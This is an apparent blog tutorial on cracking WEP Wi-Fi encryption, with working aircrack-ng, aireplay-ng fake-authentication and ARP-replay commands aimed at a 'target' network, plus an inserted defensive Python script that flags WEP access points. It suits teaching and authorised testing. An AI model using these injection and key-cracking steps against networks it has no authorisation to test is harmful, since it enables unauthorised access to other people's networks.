Network Penetration Testing — Gaining Access
Because we will be going deeper into ethical hacking later on, and that requires a Wi-Fi connection, this post looks at the different forms of wireless encryption and how their keys are recovered. If the target network uses encryption, you cannot do much until you have the key, so we will cover how WEP, WPA, and WPA2 are broken.
The first one we will look at is Wired Equivalent Privacy (WEP), because it is the oldest and also the easiest to crack. WEP encrypts traffic with the RC4 stream cipher.
To break a WEP network, we first have to capture packets, i.e., the data exchanged between the connected devices and the router.
If the network is busy, it is easier to crack because it generates more packets; if it is not, cracking takes longer, or we have to generate packets ourselves after a fake authentication.
Once enough packets have been captured, we can analyze their IVs (initialization vectors) and crack the key.
To begin, boot up our hacking beast, Kali Linux. If you don't remember how, go back and read the previous blog!
Now, to crack any of these encryptions (WEP, WPA, WPA2) or to inject packets, we need a wireless adapter. Many are on the market; before buying one, check that it supports Kali Linux and monitor mode.
After you’ve connected it, you’ll need to enable monitor mode. To do so, follow these steps:
- Open a terminal and type:
- ifconfig wlan0 down
- airmon-ng check kill
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
- Monitor mode is now enabled.
Now run the following command to list the networks in range and the encryption each one uses — airodump-ng wlan0
The first one listed uses WEP encryption; that is the network we will crack in this blog.
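As an added example (not code from the original post), here is a small Python script for the defender's side of the same airodump-ng output: it parses the CSV that airodump-ng writes when run with -w, and flags every access point still advertising WEP together with its captured-IV count, so an administrator sweeping their own site can find legacy networks that must move to WPA2. The CSV column layout is assumed to match airodump-ng's, and the sample rows are constructed.

```python
import csv

# Constructed sample of an airodump-ng CSV capture (as written with -w <prefix>).
# Column layout is assumed to follow airodump-ng's CSV output; all values are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP , WEP, OPN, -40, 120, 45000,   0.  0.  0.  0,   8, LegacyAP, 
66:77:88:99:AA:BB, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55,  80,     0,   0.  0.  0.  0,   9, OfficeNet, 
CC:DD:EE:FF:00:11, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN ,    , , -70,  30,     0,   0.  0.  0.  0,   5, Guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2024-01-01 10:00:00, 2024-01-01 10:05:00, -60, 300, 00:11:22:33:44:55, 
"""


def parse_access_points(csv_text):
    """Return one dict per access point from the AP section of an airodump-ng CSV."""
    ap_section = csv_text.split("\n\n", 1)[0]  # AP rows precede the blank line; stations follow it
    rows = [[cell.strip() for cell in row] for row in csv.reader(ap_section.splitlines())]
    header, body = rows[0], rows[1:]
    col = {name: i for i, name in enumerate(header)}
    aps = []
    for row in body:
        if len(row) < len(header) - 1 or not row[0]:
            continue  # skip partial or empty rows
        aps.append({
            "bssid": row[col["BSSID"]],
            "essid": row[col["ESSID"]],
            "channel": int(row[col["channel"]]),
            "privacy": row[col["Privacy"]],
            "ivs": int(row[col["# IV"]] or 0),  # unique IVs seen; grows fastest on busy WEP APs
        })
    return aps


def find_wep_networks(csv_text):
    """List (essid, bssid, ivs) for every network still advertising WEP."""
    return [(ap["essid"], ap["bssid"], ap["ivs"])
            for ap in parse_access_points(csv_text)
            if "WEP" in ap["privacy"].upper()]


if __name__ == "__main__":
    for essid, bssid, ivs in find_wep_networks(SAMPLE_CSV):
        print(f"WEP still in use: {essid} ({bssid}), {ivs} IVs captured; migrate to WPA2")
```

Point the script at the real .csv file that airodump-ng -w produces to audit your own network inventory.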
If the network is already busy and you are capturing a large number of packets, you can skip to the next step; if not, we need to create a fake association with fakeauth and generate packets with arpreplay.
aireplay-ng --fakeauth 0 -a (BSSID of the target) -h (MAC address of your Wi-Fi adapter, shown by ifconfig) wlan0
This command fakes an association with the router; now we can generate packets with the following command -
aireplay-ng --arpreplay -b (BSSID of the target) -h (MAC address of your Wi-Fi adapter, shown by ifconfig) wlan0
Now that packets are being captured, we can analyze them and recover the key; for that we use aircrack-ng.
aircrack-ng arpreplay-01.cap
Wait for it to finish; when it is done, aircrack-ng shows us the password.
The commands we used -
- ifconfig wlan0 down
- airmon-ng check kill
- iwconfig wlan0 mode monitor
- ifconfig wlan0 up
- airodump-ng wlan0
- aireplay-ng --fakeauth 0 -a (BSSID of the target) -h (MAC address of your Wi-Fi adapter, shown by ifconfig) wlan0
- aireplay-ng --arpreplay -b (BSSID of the target) -h (MAC address of your Wi-Fi adapter, shown by ifconfig) wlan0
- aircrack-ng arpreplay-01.cap
Brain Tattoo:-
- To crack a WEP network, we first have to collect a large number of packets
- If the network is not busy, we have to generate packets first
- After capturing the packets, we can analyze them and recover the key.
Now that you know how WEP encryption is cracked, stay tuned to learn how WPA/WPA2 encryption is cracked.
DISCLAIMER: This blog does NOT promote or encourage any illegal activities; all content provided by this blog is meant for EDUCATIONAL and informational PURPOSES only. We will not be responsible for any illegal actions of yours.